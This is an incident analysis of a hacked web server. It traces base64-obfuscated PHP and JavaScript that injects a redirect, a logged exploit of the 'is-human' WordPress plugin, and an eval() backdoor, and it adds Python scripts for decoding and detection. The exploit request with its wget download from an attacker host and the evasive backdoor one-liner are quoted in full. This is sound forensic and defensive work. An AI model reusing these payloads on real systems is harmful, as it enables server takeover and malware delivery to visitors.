Infected PHP files start with a single, very long line:
<?php $str=base64_decode('ZXJyb3JfcmVwb3J0 [...] KfQ=='); ?>
which decodes to another PHP snippet that itself carries a base64-encoded string:
<?php echo(base64_decode('PHNjcmlwdD5oPS1wYXJzZUl [...] Y3JpcHQ+')); ?>
which in turn decodes to obfuscated JavaScript:
<script>h=-parseInt('012')/5 [...] n="3.5@3.5@51.5@50@15 [...] +q)</script>
which, once evaluated in the visitor's browser, emits HTML that tries to load http://mtyndtyudnzst6ymu87u.rr.nu/?go=2
According to other reports, URLs of this kind lead to a "rogueware" (fake antivirus) site; at the time of writing this particular domain has expired.
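The three-layer chain above (PHP wrapper, inner PHP, JavaScript) is tedious to peel by hand when there are hundreds of infected files. The following script is an added example written for this page, not code from the original sample or its author: it repeatedly finds the first base64_decode('...') call in the current layer, decodes it, and collects every layer so that URLs (the indicator worth extracting) can be pulled from the last one. The sample file it builds is constructed here with the same shape as the infection; the obfuscated JavaScript of the real sample is not reproduced and the domain redirector.example is made up.

```python
import base64
import re

# base64_decode('<blob>') as it appears inside the injected PHP wrapper (quoted argument).
B64_CALL = re.compile(r"base64_decode\(\s*'([A-Za-z0-9+/=]+)'\s*\)")
URL_RE = re.compile(r"https?://[^\s'\"<>)\\]+")


def unwrap_layers(src, max_depth=10):
    """Return [src, layer1, layer2, ...]: each entry is the decode of the first
    base64_decode('...') call found in the previous entry. Stops when no such
    call is left, when the blob is not valid base64, or after max_depth layers
    (guard against a self-referencing blob)."""
    layers = [src]
    for _ in range(max_depth):
        m = B64_CALL.search(layers[-1])
        if not m:
            break
        try:
            decoded = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        except ValueError:
            break
        layers.append(decoded)
    return layers


def extract_urls(text):
    """URLs mentioned in a decoded layer: the quickest indicator to pull out of the chain."""
    return URL_RE.findall(text)


def build_sample():
    """Constructed stand-in for an infected file with the same three-layer shape
    (PHP -> PHP -> JavaScript). The script body and the domain are made up for
    this example; they are not the ones from the real sample."""
    js = ("<script>document.write('<iframe src=\"http://redirector.example/?go=2\""
          " width=1 height=1></iframe>')</script>")
    inner = "<?php echo(base64_decode('%s')); ?>" % base64.b64encode(js.encode()).decode()
    outer = ("<?php $str=base64_decode('%s'); eval($str); ?>\n"
             "<?php /* original file content follows */ ?>"
             % base64.b64encode(inner.encode()).decode())
    return outer


if __name__ == "__main__":
    layers = unwrap_layers(build_sample())
    for depth, layer in enumerate(layers):
        print("layer %d: %s" % (depth, layer[:80]))
    print("URLs in last layer:", extract_urls(layers[-1]))
```

Run it against a real infected file by replacing build_sample() with the file's content; the loop stops by itself at the JavaScript layer, which no longer contains a base64_decode() call.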
This infection came from a backdoor installed in another virtual host on the same server.
The HTTP server logs show the attacking host sending this request:
GET /.../wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval(base64_decode(cGFzc3RocnUoJ3dnZXQgaHR0cDovL3Ryb2xsLmhyMDAucnUvc2gudHh0OyBtdiBzaC50eHQgaXNfaHVtYW5fY2xhc3MucGhwJyk7));error HTTP/1.1
The base64 argument decodes to:
passthru('wget http://troll.hr00.ru/sh.txt; mv sh.txt is_human_class.php');
That is, the injected code downloads a PHP backdoor with wget and stores it as is_human_class.php. Note that the blob is passed to base64_decode() without quotes: PHP 5 treats an undefined bare-word constant as a string equal to its own name (raising only an E_NOTICE), so the payload needs no quote characters in the URL.
This attack targets a vulnerable version of the "is-human" WordPress plugin, which evaluates the type parameter as PHP code; the attacker's eval(...) therefore runs with the web server's privileges.
The HTTP server logs also show the attacking host sending this request:
"GET /[random existing directory]/url(data:image/png;base64,iVBORw0KGgoA [...] RK5CYII%3d) HTTP/1.1"
This base64 data decodes to a real image file (a PNG):
It doesn't seem to be an exploit, but it makes no sense to me.
The backdoor file on the server, as listed by ls -l:
-rw-r--r-- 1 webservd webservd 1026 Apr 2 08:18 ibqmfxq.php
After decoding base64 twice, you get:
if(isset($_REQUEST['a'.'sc']))eval(stripslashes($_REQUEST['a'.'sc'])/*M8K@\.*/);
That means that a request to http://example.com/ibqmfxq.php?asc=[some string] executes the string as PHP with the permissions of the webservd user, the account the web server runs as. The parameter name is split as 'a'.'sc' and a comment is stuffed inside the call so that a plain grep for "asc" or for the usual eval($_REQUEST[ pattern does not match. Note also that the file is owned by webservd: the web server account can write to the document root, which is what lets a backdoor running under it drop files and rewrite the site's index.php files.
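Because of the 'a'.'sc' split and the inline comment, a literal search for the parameter name misses this backdoor. The triage script below is an added example written for this page (not code from the original write-up): it folds chained single-quoted literals, strips block comments, and only then matches eval() of a request superglobal; it also flags files whose first line is the injected base64_decode() wrapper. The sample web root is constructed here; ibqmfxq.php carries the one-liner quoted above (as it reads after the two base64 layers are removed), and the other two files are made up.

```python
import re

# Constructed sample web root for this example: path -> file content.
SAMPLE_FILES = {
    "/var/www/site/ibqmfxq.php":
        "<?php if(isset($_REQUEST['a'.'sc']))eval(stripslashes($_REQUEST['a'.'sc'])/*M8K@\\.*/); ?>",
    "/var/www/site/index.php":
        "<?php $str=base64_decode('" + "QUFB" * 100 + "'); eval($str); ?>\n<?php echo 'site'; ?>",
    "/var/www/site/includes/helper.php":
        "<?php function helper($x) { return htmlspecialchars($x); } ?>",
}

# 'a'.'sc' -> 'asc': literal concatenation used to keep "asc" out of a naive grep.
CONCAT_RE = re.compile(r"'([^'\\]*)'\s*\.\s*'([^'\\]*)'")
# /* ... */ comments, such as the /*M8K@\.*/ stuffed into the eval() call.
COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)
# eval( ... $_REQUEST['name'] ... ), also for GET, POST and COOKIE.
EVAL_INPUT_RE = re.compile(
    r"eval\s*\(.*?\$_(REQUEST|GET|POST|COOKIE)\s*\[\s*'([^']+)'\s*\]", re.S)
# File begins with the injected wrapper: <?php $var=base64_decode('<long blob>')
PREFIX_RE = re.compile(r"^\s*<\?php\s*\$\w+\s*=\s*base64_decode\('([A-Za-z0-9+/=]{100,})'\)")


def normalise(src):
    """Fold chained literals (repeat until stable, so 'a'.'s'.'c' also folds)
    and drop block comments, so the obfuscated form matches the plain signature."""
    prev = None
    while prev != src:
        prev, src = src, CONCAT_RE.sub(lambda m: "'%s%s'" % (m.group(1), m.group(2)), src)
    return COMMENT_RE.sub("", src)


def find_eval_backdoor(src):
    """Return {'superglobal': ..., 'param': ...} for the first eval() of request input, else None."""
    m = EVAL_INPUT_RE.search(normalise(src))
    return {"superglobal": m.group(1), "param": m.group(2)} if m else None


def find_injected_prefix(src):
    """Return the blob length when the file starts with the injected wrapper, else None."""
    m = PREFIX_RE.match(src)
    return len(m.group(1)) if m else None


def triage(files):
    """Map each suspicious path to the list of indicators that fired."""
    report = {}
    for path, src in files.items():
        indicators = []
        hit = find_eval_backdoor(src)
        if hit:
            indicators.append("eval() of $_%s['%s']" % (hit["superglobal"], hit["param"]))
        n = find_injected_prefix(src)
        if n:
            indicators.append("starts with base64_decode() of a %d-char blob" % n)
        if indicators:
            report[path] = indicators
    return report


if __name__ == "__main__":
    for path, indicators in sorted(triage(SAMPLE_FILES).items()):
        print(path, "->", "; ".join(indicators))
```

To run this over a real document root, build the files dict by walking the tree and reading every *.php file; the normalisation step is what makes the signature survive the 'a'.'sc' trick, and the fixpoint loop handles deeper splits such as 'a'.'s'.'c'.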
The server logs show many requests to this backdoor from different source addresses, always using the POST method, so the executed code is not visible: the access log records the request line and query string, not the POST body.
The error log does show the consequences of the executed code: attempts to remove files from /tmp, to download files with wget, curl, fetch and lwp-download, and to run a Perl script named "z"...
The time of the last access to this backdoor coincides with the last mass infection of the index.php files.
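Both log observations on this page, the is-human exploit attempt in the GET query string and the POST hits on the ibqmfxq.php backdoor that precede the index.php rewrite, come down to the same access-log parsing. The script below is an added example written for this page, not code from the original write-up: it flags engine.php requests whose type parameter carries PHP syntax and decodes any base64_decode() argument in them (quoted or, as in the logged request, bare), lists the POST hits on the backdoor with their source addresses, and reports which files were modified within a short window after the last hit. The log lines and file modification times are constructed for the example; the first request line is the one quoted above placed under a made-up /blog/ path, and the IP addresses are documentation ranges.

```python
import base64
import re
from datetime import datetime, timedelta, timezone
from urllib.parse import unquote

# Constructed Apache combined-format log lines for this example.
SAMPLE_LOG = [
    '198.51.100.23 - - [01/Apr/2012:22:40:11 +0000] "GET /blog/wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval(base64_decode(cGFzc3RocnUoJ3dnZXQgaHR0cDovL3Ryb2xsLmhyMDAucnUvc2gudHh0OyBtdiBzaC50eHQgaXNfaHVtYW5fY2xhc3MucGhwJyk7));error HTTP/1.1" 200 1834 "-" "Mozilla/4.0"',
    '203.0.113.5 - - [02/Apr/2012:08:17:02 +0000] "POST /ibqmfxq.php HTTP/1.1" 200 77 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [02/Apr/2012:08:17:40 +0000] "POST /ibqmfxq.php HTTP/1.1" 200 77 "-" "Mozilla/5.0"',
    '192.0.2.77 - - [02/Apr/2012:08:18:03 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [02/Apr/2012:08:18:15 +0000] "POST /ibqmfxq.php HTTP/1.1" 200 77 "-" "Mozilla/5.0"',
]

# Constructed modification times of files under the document root (what `find -newer` would give).
SAMPLE_MTIMES = {
    "/var/www/site/index.php": datetime(2012, 4, 2, 8, 18, 20, tzinfo=timezone.utc),
    "/var/www/site/blog/index.php": datetime(2012, 4, 2, 8, 18, 21, tzinfo=timezone.utc),
    "/var/www/site/includes/helper.php": datetime(2012, 3, 10, 12, 0, 0, tzinfo=timezone.utc),
}

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
# base64_decode( argument, with or without quotes (the logged request uses a bare word).
B64_ARG = re.compile(r"base64_decode\(\s*['\"]?([A-Za-z0-9+/=]+)")
IS_HUMAN_ENGINE = "/wp-content/plugins/is-human/engine.php"


def parse(line):
    """Split one combined-format line into ip, ts (aware datetime), method, path, query, status."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["path"], _, rec["query"] = rec["target"].partition("?")
    return rec


def query_params(query):
    """Minimal query parser: split on '&' only, so ';' inside injected PHP survives."""
    params = {}
    for part in query.split("&"):
        key, _, value = part.partition("=")
        params[unquote(key)] = unquote(value)
    return params


def decode_b64_args(text):
    """Decode every base64_decode(...) argument found in text (padding repaired)."""
    out = []
    for blob in B64_ARG.findall(text):
        try:
            out.append(base64.b64decode(blob + "=" * (-len(blob) % 4)).decode("utf-8", "replace"))
        except ValueError:
            pass
    return out


def is_human_attempts(lines):
    """engine.php requests whose type parameter carries PHP syntax instead of a plain name."""
    findings = []
    for rec in filter(None, map(parse, lines)):
        if not rec["path"].endswith(IS_HUMAN_ENGINE):
            continue
        type_val = query_params(rec["query"]).get("type", "")
        if any(c in type_val for c in "();$") or "eval" in type_val:
            findings.append({"ip": rec["ip"], "ts": rec["ts"], "type": type_val,
                             "decoded": decode_b64_args(type_val)})
    return findings


def backdoor_hits(lines, backdoor_path):
    """(timestamp, ip, method) for every request to the backdoor, oldest first."""
    return sorted((rec["ts"], rec["ip"], rec["method"])
                  for rec in filter(None, map(parse, lines)) if rec["path"] == backdoor_path)


def modified_after_last_hit(hits, mtimes, window=timedelta(minutes=5)):
    """Files whose mtime falls within `window` after the last backdoor hit."""
    if not hits:
        return []
    last = hits[-1][0]
    return sorted(p for p, t in mtimes.items() if last <= t <= last + window)


if __name__ == "__main__":
    for f in is_human_attempts(SAMPLE_LOG):
        print("is-human exploit attempt from", f["ip"], "at", f["ts"], "->", f["decoded"])
    hits = backdoor_hits(SAMPLE_LOG, "/ibqmfxq.php")
    print("backdoor hits:", len(hits), "from", sorted({ip for _, ip, _ in hits}))
    print("modified within 5 min of last hit:", modified_after_last_hit(hits, SAMPLE_MTIMES))
```

The POST bodies are gone, but the timing is not: correlating the last backdoor hit with the mtimes of the rewritten index.php files is what ties the two together, and the distinct source addresses show that more than one operator (or proxy) was driving the backdoor.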
This site was running Drupal 5.7, a 2008 release with known vulnerabilities.
Infected HTML files carry the same obfuscated JavaScript directly:
<script>h=-parseInt('012')/5 [...] n="3.5@3.5@51.5@50@15 [...] +q)</script>
Last Modified: April 20, 2012